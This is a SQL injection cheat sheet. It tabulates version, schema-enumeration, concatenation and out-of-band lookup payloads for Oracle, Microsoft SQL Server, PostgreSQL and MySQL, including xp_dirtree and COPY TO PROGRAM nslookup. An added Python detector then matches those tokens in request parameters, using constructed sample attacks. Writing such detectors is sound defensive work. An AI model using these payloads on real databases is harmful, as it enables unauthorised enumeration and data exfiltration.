Once SQL injection has been identified, the next step is to enumerate the underlying database engine. Unfortunately, each database engine uses its own syntax for metadata, which makes this process highly engine-dependent.

Database | Version Info |
---|---|
Oracle | `SELECT banner FROM v$version`<br>`SELECT version FROM v$instance` |
Microsoft | `SELECT @@version` |
PostgreSQL | `SELECT version()` |
MySQL | `SELECT @@version` |

Listing tables and the columns they contain:

Database | Contents Info |
---|---|
Oracle | `SELECT * FROM all_tables`<br>`SELECT * FROM all_tab_columns WHERE table_name = 'Table Name'` |
Microsoft | `SELECT * FROM information_schema.tables`<br>`SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'` |
PostgreSQL | `SELECT * FROM information_schema.tables`<br>`SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'` |
MySQL | `SELECT * FROM information_schema.tables`<br>`SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'` |

Database | Concatenation |
---|---|
Oracle | `'a'\|\|'b'` |
Microsoft | `'a'+'b'` |
PostgreSQL | `'a'\|\|'b'` |
MySQL | `'a' 'b'` (space) or `CONCAT('a','b')` |

Database | Lookup Syntax |
---|---|
Oracle | `SELECT UTL_INADDR.get_host_address('domain')` (requires elevated privileges) |
Microsoft | `exec master..xp_dirtree '//domain/a'` |
PostgreSQL | `copy (SELECT '') to program 'nslookup domain'` |
MySQL | These work only on Windows:<br>`LOAD_FILE('\\\\domain\\a')`<br>`SELECT ... INTO OUTFILE '\\\\domain\a'` |
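
For detection, the metadata and lookup tokens in the tables above can be matched against user-supplied request parameters, where they have no legitimate reason to appear. The following is an added example, not part of the original page; the signature labels, function names and sample requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Labels are names chosen for this example; the patterns come from the tables above.
SIGNATURES = [
    ("version-probe", re.compile(
        r"@@version|\bversion\s*\(\s*\)|\bv\$(?:version|instance)\b", re.I)),
    ("schema-enum", re.compile(
        r"\binformation_schema\.(?:tables|columns)\b|\ball_(?:tables|tab_columns)\b", re.I)),
    ("outbound-lookup", re.compile(
        r"\butl_inaddr\.get_host_address\b|\bxp_dirtree\b|\bcopy\b.+?\bto\s+program\b"
        r"|\bload_file\s*\(\s*'\\\\|\binto\s+outfile\s+'\\\\", re.I)),
]

def classify_request(url):
    """Return the sorted signature labels found in any query-parameter value."""
    hits = set()
    # parse_qsl percent-decodes values and turns '+' into spaces.
    for _name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        text = " ".join(value.split())  # collapse runs of whitespace
        for label, pattern in SIGNATURES:
            if pattern.search(text):
                hits.add(label)
    return sorted(hits)

def triage(requests):
    """Map each flagged request to its labels; clean requests are omitted."""
    return {url: labels for url in requests if (labels := classify_request(url))}

# Constructed sample request lines (not real traffic).
SAMPLE_REQUESTS = [
    "/products?category=Gifts",
    "/search?q=release+notes+version+2",
    "/products?category=SELECT+%40%40version",
    "/report?name=SELECT+banner+FROM+v%24version",
    "/items?id=SELECT+*+FROM+information_schema.tables",
    "/items?id=exec+master..xp_dirtree+%27%2F%2Fexample.invalid%2Fa%27",
    "/f?x=LOAD_FILE(%27%5C%5C%5C%5Cexample.invalid%5C%5Ca%27)",
]

if __name__ == "__main__":
    for url, labels in triage(SAMPLE_REQUESTS).items():
        print(", ".join(labels), "<-", url)
```

Run this against request parameters rather than the application's own SQL, since legitimate code and ORMs query `information_schema` and `version()` routinely.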